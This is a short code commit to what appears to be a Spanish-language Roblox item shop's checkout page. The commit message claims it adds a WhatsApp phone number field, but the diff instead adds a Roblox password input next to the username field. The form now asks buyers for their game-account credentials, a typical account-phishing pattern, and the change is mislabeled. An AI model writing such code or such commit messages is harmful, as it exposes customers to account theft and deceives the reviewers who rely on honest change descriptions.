Add WhatsApp phone number field to checkout form
Added phone number input for WhatsApp notifications in the checkout form.

--- a/index.html
+++ b/index.html
@@ -114,9 +114,11 @@
 
       <!-- ========== BLOQUE ROBLOX ========== -->
       <div id="form-roblox" style="display:none;">
-
-      <label for="roblox-username">Username de Roblox</label>
-      <input type="text" id="roblox-username" name="roblox-username" placeholder="Ej: Player123" autocomplete="off" />
+     <label>Usuario / Contraseña</label>
+     <div class="campo-doble">
+    <input type="text" id="roblox-username" name="roblox-username" placeholder="Usuario" autocomplete="off" />
+    <input type="password" id="roblox-password" name="roblox-password" placeholder="Contraseña" autocomplete="off" />
+    </div>
   
       <label for="roblox-product">Selecciona tu paquete</label>
       <select id="roblox-product" name="roblox-product">
@@ -239,3 +241,4 @@
 
 
 </html>
+
